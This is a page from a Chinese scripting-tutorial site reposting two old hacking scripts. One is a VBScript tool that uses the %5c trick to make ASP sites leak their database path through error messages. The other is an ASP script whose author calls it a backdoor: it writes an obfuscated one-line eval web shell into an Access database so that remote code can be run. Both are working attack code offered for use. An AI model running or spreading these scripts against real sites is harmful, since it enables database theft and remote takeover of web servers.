N年前的两个脚本%5c暴库_vbs教程-查字典教程网
N年前的两个脚本%5c暴库
N年前的两个脚本%5c暴库
发布时间:2016-12-28 来源:查字典编辑
摘要:DimxStatus,tStatus,vServer,vHeader,vRsBodyGetError=InputBox("请输入网站,例如:...

DimxStatus,tStatus,vServer,vHeader,vRsBody

GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")

IfGetError=""Then

MsgBox("输入错误,程序结束!")

WScript.Quit

EndIf

GetError=StrReverse(GetError)

Tem2=0

ForI=1ToLen(GetError)

IfMid(GetError,I,1)=Chr(47)AndTem2=0Then

Temp=Temp&"c5%"

Tem2=Tem2+1

Else

Temp=Temp&Mid(GetError,I,1)

EndIf

Next

GetError=StrReverse(Temp)

CallxmlPost(GetError)

ErrorText=vServer&""&xStatus

BaseSaver=GetStr(vRsBody,"找不到文件'","'。</font>"&Chr(10))

IfBaseSaver="[None]"Then

BaseSaver=GetStr(vRsBody,"<fontface="&Chr(34)&"宋体"&Chr(34)&"size=2>'","'不是一个有效的路径。")

EndIf

IfBaseSaver="[None]"Then

BaseSaver=GetStr(vRsBody,"打开注册表关键字'","'。</font>")

EndIf

IfBaseSaver="[None]"Then

AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&vRsBody&"</textarea>"

Else

AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&BaseSaver&"</textarea>"

EndIf

CallOpenWin(AllReturn)

SetWHShell=WScript.CreateObject("WScript.Shell")

WHShell.AppActivate"Mappath出错获取数据库地址Lilo"

'WHShell.SendKeys("%{TAB}")

SetWHShell=Nothing

FunctionURLEncoding(vstrIn)

strReturn=""

Fori=1ToLen(vstrIn)

ThisChr=Mid(vStrIn,i,1)

IfAbs(Asc(ThisChr))<&HFFThen

strReturn=strReturn&ThisChr

Else

innerCode=Asc(ThisChr)

IfinnerCode<0Then

innerCode=innerCode+&H10000

EndIf

Hight8=(innerCodeAnd&HFF00)&HFF

Low8=innerCodeAnd&HFF

strReturn=strReturn&"%"&Hex(Hight8)&"%"&Hex(Low8)

EndIf

Next

URLEncoding=strReturn

EndFunction

Functionbytes2BSTR(vIn)

strReturn=""

Fori=1ToLenB(vIn)

ThisCharCode=AscB(MidB(vIn,i,1))

IfThisCharCode<&H80Then

strReturn=strReturn&Chr(ThisCharCode)

Else

NextCharCode=AscB(MidB(vIn,i+1,1))

strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))

i=i+1

EndIf

Next

bytes2BSTR=strReturn

EndFunction

FunctionxmlPost(iURL)

OnErrorResumeNext

iPost=URLEncoding(iPost)

SetxPost=CreateObject("Microsoft.XMLHTTP")

xPost.open"POST",iURL,False

xPost.Send

xStatus=xPost.Status

tStatus=xPost.StatusText

vServer=xPost.GetResponseHeader("Server")

vHeader=xPost.GetAllResponseHeaders

vRsBody=bytes2BSTR(xPost.responseBody)

SetxPost=Nothing

EndFunction

FunctionGetStr(vString,iString,dString)

vSum=inStr(vRsBody,iString)

IfvSum=0ThenGetStr="[None]":ExitFunction

eSum=inStr(vSum,vRsBody,dString)

IfeSum=0ThenGetStr="[None]":ExitFunction

GetStr=Mid(vRsBody,vSum+Len(iString),eSum-vSum-Len(iString))

EndFunction

FunctionIntToStr(vNum,vLen)

IfLen(vNum)>=vLenThenIntToStr=vNum:ExitFunction

ForI=1TovLen-Len(vNum)

IntToStr=IntToStr&"0"

Next

IntToStr=IntToStr&CStr(vNum)

EndFunction

FunctionGetSplit(unStr,vaStr,Mode)

aTemp=Split(unStr,vaStr)

bTemp=Ubound(aTemp)

SelectCaseMode

Case-1:GetSplit=aTemp

Case-2:GetSplit=bTemp

EndSelect

IfMode<0ThenExitFunction

IfMode>bTempThenGetSplit=False:ExitFunction

IfMode>=0ThenGetSplit=aTemp(Mode)

EndFunction

FunctionOpenWin(vTTv)

SetIE=WScript.CreateObject("InternetExplorer.Application")

IE.Navigate"about:blank"

IE.Visible=1

IE.ToolBar=0

IE.StatusBar=0

IE.Width=500

IE.Height=335

DoWhile(IE.Busy):Loop

SetDoc=IE.Document

Doc.Open

Execute"Doc.Writeln"&Chr(34)&vTTv&Chr(34)

Doc.Close

SetIE=Nothing

EndFunction

另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%

db="0123.asp"'这里改成您的数据库地址

setconn=server.createobject("Adodb.Connection")

connstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath(db)

conn.openconnstr

'添加notdownload表

conn.execute("createtablenotdownload(notdownoleobject)")

'写入<%数据

setrs=server.createobject("adodb.recordset")

sql="select*fromnotdownload"

rs.opensql,conn,1,3

rs.addnew

rs("notdown").appendchunk(chrB(asc("<"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(""))&chrB(asc("r"))&chrB(asc("u"))&chrB(asc("n"))&chrB(asc("a"))&chrB(asc("t"))&chrB(asc("="))&chrB(asc("s"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc("v"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc(""))&chrB(asc("l"))&chrB(asc("a"))&chrB(asc("n"))&chrB(asc("g"))&chrB(asc("u"))&chrB(asc("a"))&chrB(asc("g"))&chrB(asc("e"))&chrB(asc("="))&chrB(asc("j"))&chrB(asc("a"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">"))&chrB(asc("e"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("l"))&chrB(asc("("))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("."))&chrB(asc("f"))&chrB(asc("o"))&chrB(asc("r"))&chrB(asc("m"))&chrB(asc("("))&chrB(asc("'"))&chrB(asc("#"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("+"))&chrB(asc("'"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("<"))&chrB(asc("/"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">")))

rs.update

rs.close

setrs=nothing

'关闭连接

conn.close

setconn=nothing

%>

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
    •
    最新vbs学习
    热门vbs学习
    脚本专栏子分类